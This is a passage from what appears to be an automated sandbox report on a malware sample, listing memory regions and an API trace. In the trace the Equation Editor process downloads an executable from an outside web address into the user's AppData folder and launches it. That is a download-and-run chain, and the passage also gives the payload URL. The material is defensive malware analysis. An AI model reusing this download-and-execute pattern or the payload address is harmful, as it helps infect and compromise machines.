"c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 878 start_va = 0x73f30000 end_va = 0x73f8efff monitored = 0 entry_point = 0x73f34af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 879 start_va = 0x71520000 end_va = 0x71531fff monitored = 0 entry_point = 0x71524510 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll") Region: id = 880 start_va = 0x714f0000 end_va = 0x7151efff monitored = 0 entry_point = 0x714fbb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 881 start_va = 0x71450000 end_va = 0x714eafff monitored = 0 entry_point = 0x7148f7e0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 882 start_va = 0xa060000 end_va = 0xa09ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a060000" filename = "" Region: id = 883 start_va = 0xa0a0000 end_va = 0xa19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a0a0000" filename = "" Region: id = 884 start_va = 0x2180000 end_va = 0x2180fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002180000" filename = "" Region: id = 885 start_va = 0x76900000 end_va = 0x76906fff monitored = 0 entry_point = 0x76901e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 886 start_va = 0x71400000 end_va = 0x7144efff monitored = 0 entry_point = 0x7140d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 887 start_va = 0x70a50000 end_va = 0x70ad3fff monitored = 0 entry_point = 0x70a76530 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 888 start_va = 0x713f0000 end_va = 0x713f7fff monitored = 0 entry_point = 0x713f1fc0 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 889 start_va = 0x2320000 end_va = 0x232ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002320000" filename = "" Region: id = 890 start_va = 0xa1a0000 end_va = 0xa1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a1a0000" filename = "" Region: id = 891 start_va = 0xa1e0000 end_va = 0xa2dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a1e0000" filename = "" Region: id = 892 start_va = 0x6f9e0000 end_va = 0x6fa26fff monitored = 0 entry_point = 0x6f9f58d0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 893 start_va = 0x2330000 end_va = 0x2333fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002330000" filename = "" Region: id = 894 start_va = 0x6fa30000 end_va = 0x6fa37fff monitored = 0 entry_point = 0x6fa31920 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 895 start_va = 0x2340000 end_va = 0x2342fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mswsock.dll.mui") Region: id = 896 start_va = 0xa2e0000 end_va = 0xa2e7fff monitored = 0 entry_point = 0xa2e19c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 897 start_va = 0xa2f0000 end_va = 0xa2f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 898 start_va = 0xa2e0000 end_va = 0xa2e7fff monitored = 0 entry_point = 0xa2e19c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 899 start_va = 0xa2f0000 end_va = 0xa2f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 900 start_va = 0xa2e0000 end_va = 0xa2e7fff monitored = 0 entry_point = 0xa2e19c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 901 start_va = 0xa2f0000 end_va = 0xa2f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 902 start_va = 0xa2e0000 end_va = 0xa2e7fff monitored = 0 entry_point = 0xa2e19c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 903 start_va = 0xa2f0000 end_va = 0xa2f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wshqos.dll.mui") Region: id = 904 start_va = 0x6f970000 end_va = 0x6f9d3fff monitored = 0 entry_point = 0x6f98afd0 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 905 start_va = 0x73f90000 end_va = 0x74107fff monitored = 0 entry_point = 0x73fe8a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 906 start_va = 0x764c0000 end_va = 0x764cdfff monitored = 0 entry_point = 0x764c5410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 907 start_va = 0xa2e0000 end_va = 0xa2e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a2e0000" filename = "" Region: id = 908 start_va = 0x6f960000 end_va = 0x6f96ffff monitored = 0 entry_point = 0x6f964600 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\SysWOW64\\mskeyprotect.dll" (normalized: "c:\\windows\\syswow64\\mskeyprotect.dll") Region: id = 909 start_va = 0x6f940000 end_va = 0x6f95ffff monitored = 0 entry_point = 0x6f94d120 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 910 start_va = 0x6f910000 end_va = 0x6f93bfff monitored = 0 entry_point = 0x6f92bb10 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\SysWOW64\\ntasn1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll") Region: id = 911 start_va = 0xa2f0000 end_va = 0xa2f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a2f0000" filename = "" Region: id = 912 start_va = 0x6f8e0000 end_va = 0x6f8e7fff monitored = 0 entry_point = 0x6f8e1d70 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\SysWOW64\\dpapi.dll" (normalized: "c:\\windows\\syswow64\\dpapi.dll") Region: id = 913 start_va = 0x74c00000 end_va = 0x74c41fff monitored = 0 entry_point = 0x74c16f10 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 914 start_va = 0x71200000 end_va = 0x71212fff monitored = 0 entry_point = 0x71209950 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 915 start_va = 0x70230000 end_va = 0x7025efff monitored = 0 entry_point = 0x702495e0 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 916 start_va = 0xa2e0000 end_va = 0xa31ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a2e0000" filename = "" Region: id = 917 start_va = 0xa320000 end_va = 0xa41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a320000" filename = "" Region: id = 918 start_va = 0x6f8f0000 end_va = 0x6f909fff monitored = 0 entry_point = 0x6f8ffa70 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\SysWOW64\\ncryptsslp.dll" (normalized: "c:\\windows\\syswow64\\ncryptsslp.dll") Region: id = 919 start_va = 0xa420000 end_va = 0xa429fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\crypt32.dll.mui") Region: id = 920 start_va = 0xa430000 end_va = 0xa440fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_20127.nls" filename = "\\Windows\\System32\\C_20127.NLS" (normalized: "c:\\windows\\system32\\c_20127.nls") Region: id = 921 start_va = 0x66000000 end_va = 0x66152fff monitored = 1 entry_point = 0x66001af8 region_type = mapped_file name = "msvbvm60.dll" filename = "\\Windows\\SysWOW64\\msvbvm60.dll" (normalized: "c:\\windows\\syswow64\\msvbvm60.dll") Region: id = 922 start_va = 0xa450000 end_va = 0xa49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a450000" filename = "" Region: id = 923 start_va = 0xa4a0000 end_va = 0xa89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a4a0000" filename = "" Region: id = 924 start_va = 0xa8a0000 end_va = 0xa99ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a8a0000" filename = "" Region: id = 925 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Thread: id = 38 os_tid = 0xc24 [0106.522] GlobalLock (hMem=0x22a0074) returned 0x42bf020 [0106.523] GetProcAddress (hModule=0x76720000, lpProcName="ExpandEnvironmentStringsW") returned 0x7673cd50 [0106.523] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe", lpDst=0x19ea34, nSize=0x104 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe") returned 0x61 [0106.523] LoadLibraryW (lpLibFileName="UrlMon") returned 0x71780000 [0106.545] GetProcAddress (hModule=0x71780000, lpProcName="URLDownloadToFileW") returned 0x717fb240 [0106.546] URLDownloadToFileW (param_1=0x0, param_2="https://pkusukoharjo.com/giving/qGTGx.exe", param_3="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe"), param_4=0x0, param_5=0x0) returned 0x0 [0114.071] LoadLibraryW (lpLibFileName="oleaut32") returned 0x76680000 [0114.071] GetProcAddress (hModule=0x76680000, lpProcName="SysAllocString") returned 0x76699c90 [0114.072] LoadLibraryW (lpLibFileName="msvbvm60") returned 0x66000000 [0115.133] GetVersion () returned 0x23f00206 [0115.133] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76720000 [0115.138] GetProcAddress (hModule=0x76720000, lpProcName="IsTNT") returned 0x0 [0115.138] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0xa490000 [0115.139] VirtualAlloc (lpAddress=0x0, dwSize=0x400000, flAllocationType=0x2000, flProtect=0x4) returned 0xa4a0000 [0115.139] VirtualAlloc (lpAddress=0xa4a0000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0xa4a0000 [0115.141] GetCurrentThreadId () returned 0xc24 [0115.141] GetCommandLineA () returned="\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE\" -Embedding" [0115.141] GetEnvironmentStringsW () returned 0x815630* [0115.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1444, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1444 [0115.141] RtlAllocateHeap (HeapHandle=0xa490000, Flags=0x0, Size=0x5b0) returned 0xa4905a8 [0115.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1444, lpMultiByteStr=0xa4905a8, cbMultiByte=1444, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1444 [0115.141] FreeEnvironmentStringsW (penv=0x815630) returned 1 [0115.141] RtlAllocateHeap (HeapHandle=0xa490000, Flags=0x0, Size=0x480) returned 0xa490b60 [0115.141] GetStartupInfoA (in: lpStartupInfo=0x19e624 | out: lpStartupInfo=0x19e624*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE\"", dwX=0x28, dwY=0x28, dwXSize=0x50, dwYSize=0x28, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x80, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0115.141] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0115.141] GetFileType (hFile=0x0) returned 0x0 [0115.141] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0115.141] GetFileType (hFile=0x0) returned 0x0 [0115.141] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0115.142] GetFileType (hFile=0x0) returned 0x0 [0115.142] SetHandleCount (uNumber=0x20) returned 0x20 [0115.142] GetACP () returned 0x4e4 [0115.142] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19e64c | out: lpCPInfo=0x19e64c) returned 1 [0115.142] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x6610c528, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\equation\\eqnedt32.exe")) returned 0x4a [0115.146] HeapFree (in: hHeap=0xa490000, dwFlags=0x0, lpMem=0xa4905a8 | out: hHeap=0xa490000) returned 1 [0115.147] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x76720000 [0115.147] GetProcAddress (hModule=0x76720000, lpProcName="IsProcessorFeaturePresent") returned 0x76739bf0 [0115.147] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0115.147] RtlAllocateHeap (HeapHandle=0xa490000, Flags=0x8, Size=0x800) returned 0xa490fe8 [0115.150] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x518 [0115.150] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x3b8 [0115.151] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0115.151] GetModuleFileNameA (in: hModule=0x66000000, lpFilename=0x6610e6c8, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\msvbvm60.DLL" (normalized: "c:\\windows\\syswow64\\msvbvm60.dll")) returned 0x20 [0115.151] GetVersion () returned 0x23f00206 [0115.151] lstrcmpiW (lpString1="A", lpString2="B") returned -1 [0115.152] GetUserDefaultLCID () returned 0x409 [0115.152] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="A", cchCount1=-1, lpString2="B", cchCount2=-1) returned 1 [0115.152] GetSystemMetrics (nIndex=5) returned 1 [0115.152] GetSystemMetrics (nIndex=6) returned 1 [0115.152] GetSystemMetrics (nIndex=11) returned 32 [0115.152] GetSystemMetrics (nIndex=12) returned 32 [0115.152] GetSystemMetrics (nIndex=34) returned 136 [0115.152] GetSystemMetrics (nIndex=35) returned 39 [0115.153] GetSystemMetrics (nIndex=0) returned 1440 [0115.153] GetSystemMetrics (nIndex=1) returned 900 [0115.153] GetSystemMetrics (nIndex=32) returned 8 [0115.153] GetSystemMetrics (nIndex=33) returned 8 [0115.153] GetSystemMetrics (nIndex=42) returned 0 [0115.153] GetStockObject (i=15) returned 0x188000b [0115.153] GetStockObject (i=7) returned 0x1b00017 [0115.153] GetStockObject (i=6) returned 0x1b00018 [0115.153] GetStockObject (i=8) returned 0x1b00016 [0115.153] GetStockObject (i=4) returned 0x1900011 [0115.153] GetStockObject (i=2) returned 0x1900012 [0115.153] GetStockObject (i=0) returned 0x1900010 [0115.153] GetStockObject (i=5) returned 0x1900015 [0115.153] GetStockObject (i=13) returned 0x18a0048 [0115.153] GetDC (hWnd=0x0) returned 0x22010a93 [0115.154] GetTextExtentPointA (in: hdc=0x22010a93, lpString="0", c=1, lpsz=0x19e648 | out: lpsz=0x19e648) returned 1 [0115.155] GetDeviceCaps (hdc=0x22010a93, index=14) returned 1 [0115.156] GetDeviceCaps (hdc=0x22010a93, index=12) returned 32 [0115.156] GetDeviceCaps (hdc=0x22010a93, index=88) returned 96 [0115.156] GetDeviceCaps (hdc=0x22010a93, index=90) returned 96 [0115.156] GetDeviceCaps (hdc=0x22010a93, index=38) returned 32409 [0115.156] ReleaseDC (hWnd=0x0, hDC=0x22010a93) returned 1 [0115.156] HeapCreate (flOptions=0x0, dwInitialSize=0x0, dwMaximumSize=0x0) returned 0xa990000 [0115.157] CoGetMalloc (in: dwMemContext=0x1, ppMalloc=0x6610e7d0 | out: ppMalloc=0x6610e7d0*=0x76438d00) returned 0x0 [0115.157] GetCurrentThreadId () returned 0xc24 [0115.158] GetProcAddress (hModule=0x66000000, lpProcName="rtcShell") returned 0x660cce69 [0115.160] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19e9cc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19ea10 | out: lpCommandLine="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe", lpProcessInformation=0x19ea10*(hProcess=0x2d0, hThread=0x2d4, dwProcessId=0xbb4, dwThreadId=0x9e0)) returned 1 [0115.208] GetLastError () returned 0x0 [0115.208] WaitForInputIdle (hProcess=0x2d0, dwMilliseconds=0x2710) returned 0x102 [0125.713] CloseHandle (hObject=0x2d4) returned 1 [0125.713] CloseHandle (hObject=0x2d0) returned 1 [0125.714] GetProcAddress (hModule=0x76720000, lpProcName="ExitProcess") returned 0x76747b30 [0125.714] ExitProcess (uExitCode=0x0) [0125.836] WaitForSingleObject (hHandle=0x3b8, dwMilliseconds=0xffffffff) returned 0x0 [0125.836] ResetEvent (hEvent=0x518) returned 1 [0125.836] ReleaseMutex (hMutex=0x3b8) returned 1 [0125.836] SetEvent (hEvent=0x518) returned 1 [0125.836] GetCurrentThreadId () returned 0xc24 [0125.836] GetCurrentThreadId () returned 0xc24 [0125.836] IUnknown:AddRef (This=0x76438d00) returned 0x1 [0125.836] HeapDestroy (hHeap=0xa990000) returned 1 [0125.837] CloseHandle (hObject=0x518) returned 1 [0125.837] CloseHandle (hObject=0x3b8) returned 1 [0125.839] HeapFree (in: hHeap=0xa490000, dwFlags=0x0, lpMem=0xa490b60 | out: hHeap=0xa490000) returned 1 [0125.839] VirtualFree (lpAddress=0xa4a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0125.868] HeapDestroy (hHeap=0xa490000) returned 1 Thread: id = 39 os_tid = 0xc20 Thread: id = 40 os_tid = 0xc18 Thread: id = 41 os_tid = 0xc14 Thread: id = 42 os_tid = 0xc10 Thread: id = 43 os_tid = 0xc0c Thread: id = 44 os_tid = 0xc04 Thread: id = 45 os_tid = 0x430 Thread: id = 46 os_tid = 0xba8 Process: id = "3" image_name = "jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe" filename = "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe" page_root = "0x1f952000" os_pid = "0xbb4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xc28" cmd_line = "C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fa87" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 926 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 927 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 928 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 929 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 930 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 931 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 932 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 933 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 934 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 935 start_va = 0x400000 end_va = 0x407fff monitored = 1 entry_point = 0x4037de region_type = mapped_file name = "jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe") Region: id = 936 start_va = 0x771d0000 end_va = 0x7734afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 937 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 938 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 939 start_va = 0x7fff0000 end_va = 0x7ffa1676ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 940 start_va = 0x7ffa16770000 end_va = 0x7ffa16930fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 941 start_va = 0x7ffa16931000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffa16931000" filename = "" Region: id = 942 start_va = 0x410000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 943 start_va = 0x640d0000 end_va = 0x6411ffff monitored = 0 entry_point = 0x640e8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 944 start_va = 0x64050000 end_va = 0x640c9fff monitored = 0 entry_point = 0x64063290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 945 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 946 start_va = 0x64120000 end_va = 0x64127fff monitored = 0 entry_point = 0x641217c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 947 start_va = 0x4a0000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 948 start_va = 0x6f850000 end_va = 0x6f8a8fff monitored = 1 entry_point = 0x6f860780 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 949 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 950 start_va = 0x76910000 end_va = 0x76a8dfff monitored = 0 entry_point = 0x769c1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 951 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 952 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 953 start_va = 0x5a0000 end_va = 0x65dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 954 start_va = 0x660000 end_va = 0x7dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 955 start_va = 0x73e50000 end_va = 0x73ee1fff monitored = 0 entry_point = 0x73e90380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 956 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 